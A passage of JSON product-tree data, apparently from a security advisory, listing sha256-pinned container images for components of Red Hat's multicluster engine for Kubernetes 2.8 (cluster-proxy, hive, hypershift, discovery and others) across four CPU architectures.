"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64"
},
